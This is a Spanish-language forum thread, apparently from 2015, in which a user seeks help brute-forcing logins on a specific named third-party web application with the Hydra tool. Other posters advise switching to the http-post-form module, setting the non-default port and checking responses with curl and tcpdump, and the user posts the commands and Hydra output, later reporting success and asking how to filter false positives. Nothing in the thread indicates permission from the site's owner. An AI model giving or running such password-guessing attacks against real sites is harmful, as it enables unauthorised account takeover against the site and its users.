Hola a todos, es la primera vez que escribo por el foro aunque llevo tiempo leyendo, tengo una pregunta, tengo instalado hydra en mi vps con centos, y estoy intentando hacer un ataque por fuerza bruta a esta web:
http://scorpweb.grupocobra.com:5566/scorpweb2/
Pero no soy capaz de que hydra me detecte como buenos los ataques cuando un usuario / contraseña es correcto, tengo un user y pass en esa web que meto en el archivo de usuarios y de contraseñas pero me lo detecta invalido igual que el resto, si pudieseis ayudarme OS lo agradeceria.
Un saludo
Por cierto se me olvido ponerlo, en provincia no hace falta poner nada, solo user y pass.
¿Qué comando usas?
Tienes que usar en el "service" HTTP-FORM-POST
Y a parte especificar el port 5566 que por defecto debe usar el 80.
Cita de: el-brujo en 23 Febrero 2015, 18:33 PM
¿Qué comando usas?
Tienes que usar en el "service" HTTP-FORM-POST
Y a parte especificar el port 5566 que por defecto debe usar el 80.
gracias por responder¡¡
el comando que estaba usando era:
hydra -L users.txt -P passwords.txt service http-get /scorpweb.grupocobra.com:5566/scorpweb2/
con tus indicaciones pongo:
hydra -L users.txt -P passwords.txt -s 5566 service http-post-form /scorpweb.grupocobra.com:5566/scorpweb2/
y me responde:
Hydra v6.0 (c) 2011 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2015-02-23 17:54:39
[DATA] 5 tasks, 1 servers, 5 login tries (l:1/p:5), ~1 tries per task
[DATA] attacking service http-post-form on port 5566
[STATUS] attack finished for service (waiting for childs to finish)
Process 17526: Can not connect [timeout], process exiting
Process 17523: Can not connect [timeout], process exiting
Process 17527: Can not connect [timeout], process exiting
Process 17525: Can not connect [timeout], process exiting
Process 17524: Can not connect [timeout], process exiting
Hydra (http://www.thc.org) finished at 2015-02-23 17:55:10
que hago mal? gracias de nuevo¡¡
Alguien sabe ayudarme??
intenta con curl y mira las cabeceras http y asi puedes ver lo que retorna al servidor, puede que de 200 OK o no ?
intenta hacer tcpdump tambien pasandole algo como -X -l -n y mira que ocurre cuando ejecutas hydra.
Oki, gracias
ya he conseguido hacer que funcione, ahora tengo una pregunta, ¿como hago que los resultados que me de sean correctos al 100%?
lo que me ocurre ahora, es que de vez en cuando no se si es que el servidor se queda sin responder unos segundos y durante ese tiempo las passwords que prueba las da como validas, y he comprobado el diccionario y son passwords correlativas, hay alguna manera de evitar eso?
un saludo
Cita de: lbpjunior en 20 Abril 2015, 00:10 AM
ya he conseguido hacer que funcione, ahora tengo una pregunta, ¿como hago que los resultados que me de sean correctos al 100%?
lo que me ocurre ahora, es que de vez en cuando no se si es que el servidor se queda sin responder unos segundos y durante ese tiempo las passwords que prueba las da como validas, y he comprobado el diccionario y son passwords correlativas, hay alguna manera de evitar eso?
un saludo
Cuenta, porque era que no podias?